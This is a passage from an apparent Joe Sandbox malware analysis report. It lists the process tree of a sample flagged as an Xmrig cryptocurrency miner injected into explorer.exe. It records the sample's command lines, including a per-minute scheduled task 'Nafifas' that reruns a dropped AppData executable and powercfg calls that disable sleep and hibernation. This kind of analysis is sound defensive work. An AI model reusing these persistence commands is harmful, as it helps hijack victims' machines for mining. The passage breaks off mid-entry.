                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:17:48:12
                                      Start date:18/03/2024
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:explorer.exe
                                      Imagebase:0x7ff7d6c70000
                                      File size:5'141'208 bytes
                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:false

                                      General

                                      Target ID:18
                                      Start time:17:48:13
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff704000000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:17:48:13
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x390000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 55%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff750f20000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff6de290000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:17:48:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:17:48:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:17:49:01
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0xa70000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:41
                                      Start time:17:49:08
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff6f13a0000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:42
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:43
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff7207d0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:44
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:45
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:46
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:47
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:48
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:49
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff72d450000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:50
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:51
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:52
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:53
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff72d450000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:54
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:55
                                      Start time:17:49:10
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:56
                                      Start time:17:49:10
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff7db610000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:57
                                      Start time:17:50:00
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x3f0000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:61
                                      Start time:17:51:14
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff65e490000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:62
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:63
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:64
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:65
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:66
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:67
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:68
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:69
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:70
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:71
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:72
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:73
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:74
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:75
                                      Start time:17:51:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:76
                                      Start time:17:51:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
